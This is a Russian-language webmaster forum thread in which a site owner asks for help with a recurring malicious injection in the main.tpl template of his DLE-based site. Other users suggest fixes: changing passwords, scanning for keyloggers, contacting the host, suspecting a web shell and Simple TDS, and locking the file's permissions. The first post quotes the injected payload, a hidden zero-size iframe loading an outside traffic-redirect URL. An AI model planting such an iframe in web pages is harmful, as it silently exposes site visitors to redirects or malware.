Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
  • Страница 1 из 1
  • 1
Вредоностный код понизил посещалку
#1
Вторник, 11.12.2012, 16:24
DEN35709
Проверенный
Сообщения: 185
Репутация: 116
Недавно начало всплывать при загрузке сайта, загрузка какого-то файла, на какую страничку не перейдёшь высвечивается это окошко с загрузкой...
Нашёл в файле main.tpl вот такой айфрейм код с этой же загрузкой...

<iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe>

удалил, он правда пропал, но не надолго!
Что делать уже не знаю и пароли попоменял и всё проверил, вобщем хз как с ним бароться! Мало того ещё походу из-за него посещалка начала падать.

Есть проблема ещё с одним моим сайтом: перехожу на сайт, а антивирус ругается, блокирует сайт полностью, что делать?
#2
Вторник, 11.12.2012, 17:04
woo-seo
Проверенный
Сообщения: 387
Репутация:
Где именно поменяли пароли? В ftp меняли? Проверяли сайт на лишние файлы?
#3
Вторник, 11.12.2012, 19:26
DEN35709
Проверенный
Сообщения: 185
Репутация: 116
да и в фтп менял и от админки менял и в файлах лишнии коды искал...
#4
Вторник, 11.12.2012, 20:33
Rap4ik
Проверенный
Сообщения: 251
Репутация: 231
а движок у тя лицензионный или нет?
#5
Вторник, 11.12.2012, 21:10
woo-seo
Проверенный
Сообщения: 387
Репутация:
Антивирусом проверяйся. Может keylogger подсунули.
#6
Среда, 12.12.2012, 00:58
kikoza13
Проверенный
Сообщения: 151
Репутация: 118
У меня тоже ощущение, что кто-то без вашего ведома получил доступ к сайту и загружает свою гадость. Просканируйте комп, просмотри логи доступа к админке если таковые имеются. Можно и к супорту хостинга обратиться для того, чтобы они помогли вам разобраться с проблемой.

p.s. Большая к вам просьба - разобравшись в этой истории, отпишитесь пожалуйста здесь. Интересно откуда у вас этот код появился. Спасибо и удачи y
#7
Среда, 12.12.2012, 12:55
Miha_Kachek
Пользователь
Сообщения: 18
Репутация: -76
Ну и не фиг его сувать.
#8
Среда, 12.12.2012, 15:27
DEN35709
Проверенный
Сообщения: 185
Репутация: 116
Rap4ik, до прошлого месяца движок был не лицензионный да ещё и старый DLE 8.5, уже как раз этот </iframe> код подгружался на сайте, долго не думая и уже как бы давно хотел обновить движок, обновил купил лицуху... Да толку, как подгружался на сайт так и досихпор!

woo-seo,kikoza13 комп тремя антивирусами просканировал: авастом, касперычем и доктором вебом и сайт тоже просканировал! Ничего не нашёл :(
#9
Среда, 12.12.2012, 18:48
woo-seo
Проверенный
Сообщения: 387
Репутация:
А что за хостинг? Сколько в месяц платите?
Среда, 12.12.2012, 20:34
DEN35709
Проверенный
Сообщения: 185
Репутация: 116
еврохостер, 450р
Среда, 12.12.2012, 21:17
Rap4ik
Проверенный
Сообщения: 251
Репутация: 231
советую обратиться в хост, т.к. другой причины я не вижу или же может от шаблона?
Среда, 12.12.2012, 21:29
kikoza13
Проверенный
Сообщения: 151
Репутация: 118
[quote=DEN35709]kikoza13 комп тремя антивирусами просканировал: авастом, касперычем и доктором вебом и сайт тоже просканировал! Ничего не нашёл [/quote]

Ну в таком случае, как я и писал выше, обратитесь в тех.поддержку самого хостинга. Уверен, что они быстро разберутся с вашей проблемой.
Среда, 12.12.2012, 23:10
DEN35709
Проверенный
Сообщения: 185
Репутация: 116
Rap4ik, kikoza13, не знаю помогут ли...
Четверг, 13.12.2012, 02:19
kikoza13
Проверенный
Сообщения: 151
Репутация: 118
[quote=DEN35709]kikoza13, не знаю помогут ли...[/quote]

А почему нет? Напиши им нормально, чётко изложи проблему и попроси помочь. Я более чем уверен в том, что тебе помогут. Намекни аккуратно, что тебе нет смысла платить за хостинг если с сайтом такая ерунда. Одним словом, заставь их шевелиться ))
Среда, 02.01.2013, 16:33
SeoF1
Проверенный
Сообщения: 273
Репутация: 269
Судя по всему, кто то пользуется дыркой на вашем сайте, налицо признаки Simple TDS.

Надо движок скорей всего обновлять на официальный, ну или хотя бы не нуленный. Скорей всего шелл засел в каком то файле, с злоумышленник постоянно обновляет содержимое вашего сайта.

На крайний случай, если обновление невозможно, зайдите на сервер под root-ом, и поставьте на файл main.tpl пользователя root. В этом случае злодей не сможет скорей всего заменить его содержимое.

Даже вы не сможете скорей всего из админки отредактировать шаблон. Ну или попробуйте поставить на него права 444, однако в этом случае он может не открываться. Поэтому попробуйте оба варианта.

Если не помогут, тогда только искать дырку, или обновить движок.
От плюсов не отказываюсь!!! =)

Мой Блог: seo-site.pro

Пиломатериалы в Харькове: pilorama.kh.ua
  • Страница 1 из 1
  • 1
Поиск:
Форум
Социальные сети
Хостинг от uCoz